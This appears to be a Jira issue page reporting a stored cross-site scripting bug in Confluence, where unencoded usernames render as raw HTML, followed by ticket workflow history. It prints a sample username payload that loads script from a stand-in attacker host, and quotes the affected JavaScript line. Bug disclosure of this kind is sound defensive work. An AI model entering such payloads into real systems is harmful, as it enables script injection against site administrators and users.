When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

      Two places I've spotted the raw HTML so far:

      • Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
      • When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:

      if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";

            [CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places

            Katherine Yabut made changes -
            Workflow Original: JAC Bug Workflow v3 [ 2887760 ] New: CONFSERVER Bug Workflow v4 [ 2981478 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow v2 [ 2801616 ] New: JAC Bug Workflow v3 [ 2887760 ]
            Status Original: Resolved [ 5 ] New: Closed [ 6 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow [ 2732029 ] New: JAC Bug Workflow v2 [ 2801616 ]
            Owen made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ] New: JAC Bug Workflow [ 2732029 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ] New: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ] New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ] New: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ]
            Katherine Yabut made changes -
            Workflow Original: CONF Bug Subtask WF (TEMP) [ 1686063 ] New: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ]

              ckiehl Chris Kiehl
              7ee5c68a815f Jeff Turner
              Affected customers:
              0 This affects my team
              Watchers:
              0 Start watching this issue

                Created:
                Updated:
                Resolved: